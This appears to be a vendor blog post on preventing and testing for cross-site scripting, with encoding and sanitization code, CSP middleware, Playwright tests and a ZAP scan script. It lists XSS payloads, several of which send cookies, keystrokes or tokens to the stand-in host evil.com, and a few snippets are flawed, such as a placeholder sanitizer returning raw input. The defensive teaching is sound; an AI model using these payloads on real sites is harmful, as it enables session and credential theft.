Back to Blog

XSS Prevention and Testing: Close the OWASP Injection Vulnerability Attackers Count On

A malicious script injected into your application executes in thousands of user browsers, stealing sessions, credentials, and sensitive data. XSS remains one of the most common web vulnerabilities. Learn how to prevent, detect, and test for all types of XSS attacks.

Published

11 min read

Reading time

XSS Prevention and Testing: Close the OWASP Injection Vulnerability Attackers Count On

A user submits a comment: <script>fetch('https://evil.com?cookie='+document.cookie)</script>

Your application stores it in the database. Renders it on the page. Every visitor's session cookie is now sent to an attacker's server. Game over.

This is XSS (Cross-Site Scripting), and it's been in the OWASP Top 10 for 20 years.

Despite decades of awareness, XSS remains pervasive:

  • 30% of all web applications have at least one XSS vulnerability
  • 60% of attacks involve XSS as part of the kill chain
  • Average cost: $390k per data breach involving XSS

Why is it still common? Because XSS has many forms, appears in unexpected places, and developers often misunderstand sanitization.

This guide shows you how to prevent, detect, and test for all types of XSS vulnerabilities systematically.

Understanding XSS Types

graph TD
    A[XSS Types] --> B[Reflected XSS]
    A --> C[Stored XSS]
    A --> D[DOM-based XSS]

    B --> B1[URL Parameter]
    B --> B2[Search Query]
    B --> B3[Error Message]

    C --> C1[User Comments]
    C --> C2[Profile Data]
    C --> C3[File Upload Names]

    D --> D1[JavaScript eval]
    D --> D2[innerHTML]
    D --> D3[document.write]

    style A fill:#bbdefb
    style B fill:#fff9c4
    style C fill:#ffccbc
    style D fill:#f8bbd0

XSS Type Comparison

Type Stored on Server Execution Severity Example
Reflected ❌ No Immediate (URL) High ?search=<script>alert(1)</script>
Stored ✅ Yes On page load Critical Comment with <script> tag
DOM-based ❌ No Client-side JS High location.hash used in innerHTML

XSS Attack Vectors

// Common XSS payloads testers should know

const xssPayloads = {
  // Basic script injection
  basic: '<script>alert(document.cookie)</script>',

  // Event handler injection
  eventHandler: '<img src=x onerror="alert(1)">',

  // SVG injection
  svg: '<svg onload="alert(1)">',

  // JavaScript protocol
  jsProtocol: '<a href="javascript:alert(1)">Click</a>',

  // Data URI
  dataUri: '<iframe src="data:text/html,<script>alert(1)</script>"></iframe>',

  // Template injection (Angular)
  angular: '{{constructor.constructor("alert(1)")()}}',

  // Bypassing filters
  bypassSpace: '<img/src=x/onerror=alert(1)>',
  bypassQuotes: '<img src=x onerror=alert(1)>',
  bypassCase: '<ScRiPt>alert(1)</ScRiPt>',

  // Encoded payloads
  htmlEntity: '&lt;script&gt;alert(1)&lt;/script&gt;',
  url: '%3Cscript%3Ealert(1)%3C/script%3E',

  // Cookie stealing
  cookieTheft: '<script>new Image().src="https://evil.com?c="+document.cookie</script>',

  // Keylogger
  keylogger: '<script>document.onkeypress=e=>fetch("https://evil.com?k="+e.key)</script>',

  // Session hijacking
  hijack: '<script>fetch("https://evil.com",{method:"POST",body:localStorage.getItem("token")})</script>',
};

Prevention Strategies

1. Output Encoding (Server-Side)

// xss-prevention.ts

/**
 * Context-aware output encoding
 */
class XSSPrevention {
  /**
   * HTML context encoding
   */
  static encodeHTML(input: string): string {
    return input
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#x27;')
      .replace(/\//g, '&#x2F;');
  }

  /**
   * JavaScript context encoding
   */
  static encodeJS(input: string): string {
    return input
      .replace(/\\/g, '\\\\')
      .replace(/'/g, "\\'")
      .replace(/"/g, '\\"')
      .replace(/\n/g, '\\n')
      .replace(/\r/g, '\\r')
      .replace(/\t/g, '\\t')
      .replace(/</g, '\\x3C')
      .replace(/>/g, '\\x3E');
  }

  /**
   * URL context encoding
   */
  static encodeURL(input: string): string {
    return encodeURIComponent(input);
  }

  /**
   * CSS context encoding
   */
  static encodeCSS(input: string): string {
    return input.replace(/[^a-zA-Z0-9]/g, (match) => {
      return '\\' + match.charCodeAt(0).toString(16) + ' ';
    });
  }

  /**
   * Attribute context encoding
   */
  static encodeAttribute(input: string): string {
    return input
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#x27;');
  }
}

// Usage examples
class UserProfileComponent {
  render(user: { name: string; bio: string; website: string }) {
    return `
      <div class="profile">
        <!-- HTML context: encode HTML entities -->
        <h1>${XSSPrevention.encodeHTML(user.name)}</h1>
        
        <!-- Attribute context: encode for attribute -->
        <img src="/avatars/default.jpg" alt="${XSSPrevention.encodeAttribute(user.name)}">
        
        <!-- URL context: encode for URL -->
        <a href="${XSSPrevention.encodeURL(user.website)}">Website</a>
        
        <!-- JavaScript context: encode for JS -->
        <script>
          const userName = '${XSSPrevention.encodeJS(user.name)}';
          console.log('User:', userName);
        </script>
        
        <!-- Rich text (needs sanitization, not just encoding) -->
        <div class="bio">${this.sanitizeHTML(user.bio)}</div>
      </div>
    `;
  }

  private sanitizeHTML(html: string): string {
    // Use DOMPurify or similar library
    return html; // Placeholder
  }
}

2. Input Sanitization

// input-sanitizer.ts
import DOMPurify from 'isomorphic-dompurify';

interface SanitizationOptions {
  allowedTags?: string[];
  allowedAttributes?: Record<string, string[]>;
  allowedSchemes?: string[];
}

class InputSanitizer {
  /**
   * Sanitize HTML content (for rich text editors)
   */
  static sanitizeHTML(html: string, options: SanitizationOptions = {}): string {
    const config = {
      ALLOWED_TAGS: options.allowedTags || [
        'p',
        'br',
        'strong',
        'em',
        'u',
        'h1',
        'h2',
        'h3',
        'h4',
        'h5',
        'h6',
        'ul',
        'ol',
        'li',
        'blockquote',
        'code',
        'pre',
        'a',
        'img',
      ],
      ALLOWED_ATTR: options.allowedAttributes || {
        a: ['href', 'title', 'target'],
        img: ['src', 'alt', 'title', 'width', 'height'],
      },
      ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto|tel):|[^a-z]|[a-z+.-]+(?:[^a-z+.\-:]|$))/i,
    };

    return DOMPurify.sanitize(html, config);
  }

  /**
   * Strip all HTML tags (for plain text fields)
   */
  static stripHTML(input: string): string {
    return input.replace(/<[^>]*>/g, '');
  }

  /**
   * Sanitize URL (prevent javascript: protocol)
   */
  static sanitizeURL(url: string): string {
    const urlObj = new URL(url, 'https://example.com');

    // Only allow safe protocols
    const safeProtocols = ['http:', 'https:', 'mailto:', 'tel:'];
    if (!safeProtocols.includes(urlObj.protocol)) {
      return ''; // Reject dangerous protocols
    }

    return urlObj.href;
  }

  /**
   * Validate and sanitize filename
   */
  static sanitizeFilename(filename: string): string {
    return filename
      .replace(/[^a-zA-Z0-9._-]/g, '_') // Replace unsafe characters
      .replace(/\.{2,}/g, '.') // Prevent directory traversal
      .substring(0, 255); // Limit length
  }
}

// Express middleware example
function sanitizeInputs(req: Request, res: Response, next: NextFunction) {
  // Sanitize all string inputs
  const sanitize = (obj: any): any => {
    if (typeof obj === 'string') {
      return InputSanitizer.stripHTML(obj);
    } else if (Array.isArray(obj)) {
      return obj.map(sanitize);
    } else if (obj && typeof obj === 'object') {
      return Object.fromEntries(Object.entries(obj).map(([key, value]) => [key, sanitize(value)]));
    }
    return obj;
  };

  req.body = sanitize(req.body);
  req.query = sanitize(req.query);
  req.params = sanitize(req.params);

  next();
}

3. Content Security Policy (CSP)

// csp-middleware.ts

/**
 * Content Security Policy: The best defense against XSS
 */
function cspMiddleware(req: Request, res: Response, next: NextFunction) {
  // Generate nonce for inline scripts
  const nonce = crypto.randomBytes(16).toString('base64');
  res.locals.cspNonce = nonce;

  const csp = [
    "default-src 'self'", // Only load resources from same origin
    `script-src 'self' 'nonce-${nonce}' https://cdn.example.com`, // Scripts only from self, with nonce, or CDN
    "style-src 'self' 'unsafe-inline' https://fonts.googleapis.com", // Styles (unsafe-inline needed for some frameworks)
    "img-src 'self' data: https:", // Images from self, data URIs, or HTTPS
    "font-src 'self' https://fonts.gstatic.com", // Fonts
    "connect-src 'self' https://api.example.com", // AJAX/fetch only to API
    "frame-ancestors 'none'", // Prevent clickjacking
    "base-uri 'self'", // Restrict <base> tag
    "form-action 'self'", // Forms can only submit to same origin
    'upgrade-insecure-requests', // Upgrade HTTP to HTTPS
  ].join('; ');

  res.setHeader('Content-Security-Policy', csp);

  // Report-only mode for testing
  // res.setHeader('Content-Security-Policy-Report-Only', csp);

  next();
}

// HTML template with CSP nonce
function renderPage(content: string, nonce: string) {
  return `
    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="UTF-8">
      <!-- CSP nonce for inline scripts -->
      <script nonce="${nonce}">
        // This inline script is allowed
        console.log('Page loaded');
      </script>
    </head>
    <body>
      ${content}
      
      <!-- This will be blocked (no nonce) -->
      <!-- <script>alert('XSS')</script> -->
    </body>
    </html>
  `;
}

4. Framework-Specific Protection

// React (automatic XSS protection)
function UserProfile({ user }: { user: User }) {
  // React automatically escapes {} expressions
  return (
    <div>
      <h1>{user.name}</h1> {/* Safe: automatically escaped */}

      {/* DANGEROUS: never use dangerouslySetInnerHTML with user input */}
      <div dangerouslySetInnerHTML={{ __html: user.bio }} /> {/* ⚠️ XSS risk! */}

      {/* SAFE: Use sanitization library */}
      <div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(user.bio) }} />
    </div>
  );
}

// Vue (automatic XSS protection)
// <template>
//   <!-- Safe: automatically escaped -->
//   <h1>{{ user.name }}</h1>
//
//   <!-- DANGEROUS: v-html with user input -->
//   <div v-html="user.bio"></div> <!-- ⚠️ XSS risk! -->
//
//   <!-- SAFE: Use sanitization -->
//   <div v-html="sanitize(user.bio)"></div>
// </template>

// Angular (automatic XSS protection)
// @Component({
//   template: `
//     <!-- Safe: automatically escaped -->
//     <h1>{{user.name}}</h1>
//
//     <!-- DANGEROUS: bypass security -->
//     <div [innerHTML]="user.bio"></div> <!-- ⚠️ XSS risk! -->
//
//     <!-- SAFE: Use DomSanitizer -->
//     <div [innerHTML]="sanitizedBio"></div>
//   `
// })

Automated XSS Testing

1. Reflected XSS Testing

// xss-testing.ts
import { test, expect } from '@playwright/test';

test.describe('Reflected XSS Tests', () => {
  const xssPayloads = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(1)>',
    'javascript:alert(1)',
    '<iframe src="javascript:alert(1)">',
    '<body onload=alert(1)>',
  ];

  test('search parameter should not execute scripts', async ({ page }) => {
    for (const payload of xssPayloads) {
      await page.goto(`/search?q=${encodeURIComponent(payload)}`);

      // Check if payload is rendered as text, not executed
      const html = await page.content();

      // Payload should be escaped
      expect(html).not.toContain('<script>alert(1)</script>');

      // Should be encoded
      expect(html).toContain('&lt;script&gt;' || html.includes('\\x3Cscript'));

      // No alert dialog should appear
      page.on('dialog', (dialog) => {
        throw new Error(`XSS executed! Dialog: ${dialog.message()}`);
      });
    }
  });

  test('error messages should not execute scripts', async ({ page }) => {
    await page.goto(`/login?error=<script>alert(1)</script>`);

    const errorMessage = await page.locator('.error-message').textContent();

    // Should contain encoded version, not executable script
    expect(errorMessage).not.toMatch(/<script>/i);
  });

  test('URL parameters in attributes should be safe', async ({ page }) => {
    const payload = '"><script>alert(1)</script><a href="';
    await page.goto(`/profile?redirect=${encodeURIComponent(payload)}`);

    // Check all link hrefs
    const links = await page.locator('a').all();
    for (const link of links) {
      const href = await link.getAttribute('href');
      expect(href).not.toContain('<script>');
    }
  });
});

2. Stored XSS Testing

// stored-xss-test.ts

test.describe('Stored XSS Tests', () => {
  test('comment submission should sanitize HTML', async ({ page, request }) => {
    const xssPayload = '<script>alert(document.cookie)</script>';

    // Submit comment with XSS payload
    await request.post('/api/comments', {
      data: {
        postId: 1,
        content: xssPayload,
      },
    });

    // Load page displaying comments
    await page.goto('/posts/1');

    // XSS should NOT execute
    page.on('dialog', () => {
      throw new Error('Stored XSS executed!');
    });

    // Payload should be escaped in HTML
    const commentHTML = await page.locator('.comment').first().innerHTML();
    expect(commentHTML).not.toContain('<script>');
    expect(commentHTML).toContain('&lt;script&gt;');
  });

  test('user profile bio should sanitize rich text', async ({ page, request }) => {
    const maliciousBio = `
      <p>Hello!</p>
      <img src=x onerror="fetch('https://evil.com?cookie='+document.cookie)">
      <script>alert(1)</script>
    `;

    // Update profile with malicious bio
    await request.put('/api/users/me', {
      data: { bio: maliciousBio },
    });

    // View profile
    await page.goto('/profile');

    // Check what's rendered
    const bioHTML = await page.locator('.bio').innerHTML();

    // Allowed tags should remain
    expect(bioHTML).toContain('<p>Hello!</p>');

    // Dangerous tags should be removed
    expect(bioHTML).not.toContain('<script>');
    expect(bioHTML).not.toContain('onerror=');
  });
});

3. DOM-based XSS Testing

// dom-xss-test.ts

test.describe('DOM-based XSS Tests', () => {
  test('URL hash should not execute in innerHTML', async ({ page }) => {
    // Navigate with XSS payload in hash
    await page.goto('/dashboard#<img src=x onerror=alert(1)>');

    // Monitor for any alert dialogs (XSS execution)
    let xssTriggered = false;
    page.on('dialog', () => {
      xssTriggered = true;
    });

    await page.waitForTimeout(1000);

    expect(xssTriggered).toBe(false);
  });

  test('URL fragment used in eval should be safe', async ({ page }) => {
    // Test if app uses eval() with URL data
    await page.goto('/calculator#1+alert(1)');

    page.on('dialog', () => {
      throw new Error('DOM XSS via eval()!');
    });

    await page.waitForTimeout(1000);
  });
});

4. Automated Scanner Integration

# Using OWASP ZAP for XSS scanning
#!/bin/bash

# Start ZAP in daemon mode
docker run -d --name zap -p 8080:8080 owasp/zap2docker-stable zap.sh -daemon -port 8080 -host 0.0.0.0

# Spider the application
curl "http://localhost:8080/JSON/spider/action/scan/?url=http://app:3000"

# Run active scan with XSS focus
curl "http://localhost:8080/JSON/ascan/action/scan/?url=http://app:3000&scanPolicyName=XSS"

# Wait for scan completion
while [ $(curl -s "http://localhost:8080/JSON/ascan/view/status/" | jq '.status') != "100" ]; do
  sleep 5
done

# Get XSS alerts
curl "http://localhost:8080/JSON/alert/view/alerts/" | jq '.alerts[] | select(.pluginId == "40012" or .pluginId == "40014" or .pluginId == "40016")'

XSS Testing Checklist

Input Type Test Method Pass Criteria
Text inputs Submit XSS payloads Encoded, not executed
Rich text editors HTML payloads Sanitized (allowed tags only)
URL parameters Reflected payloads Escaped in HTML/attributes
File uploads Malicious filenames Sanitized filenames
JSON API Script in JSON Escaped when rendered
Error messages Payload in error context Encoded output
Headers XSS in User-Agent/Referer Not reflected unsafely

Conclusion

XSS is preventable with a layered defense:

  1. Output encoding (context-aware)
  2. Input sanitization (DOMPurify for HTML)
  3. Content Security Policy (blocks inline scripts)
  4. Framework protection (React/Vue/Angular escape by default)
  5. Automated testing (catch regressions)

Key takeaways:

  • Encode all user input based on context (HTML/JS/CSS/URL/attribute)
  • Use CSP to block inline scripts and unsafe-eval
  • Sanitize HTML with DOMPurify, never roll your own
  • Test systematically: reflected, stored, and DOM-based XSS
  • Never trust user input, even from authenticated users

Start securing your application today:

  1. Implement CSP headers
  2. Add DOMPurify for rich text
  3. Write XSS tests for all user inputs
  4. Run automated XSS scanning in CI/CD
  5. Monitor CSP violation reports

XSS is 20 years old, but still dangerous. Don't be the next breach headline.

Ready to automate XSS testing? Sign up for ScanlyApp and integrate security testing into your development workflow.

Related articles: Also see OWASPs full classification of injection and XSS vulnerabilities, the broader security testing program XSS prevention belongs to, and API-layer security testing where XSS payloads are often injected.

Related Posts